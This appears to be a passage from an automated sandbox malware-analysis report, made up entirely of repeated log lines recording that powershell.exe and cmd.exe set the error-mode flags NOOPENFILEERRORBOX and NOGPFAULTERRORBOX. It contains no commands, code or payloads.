        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
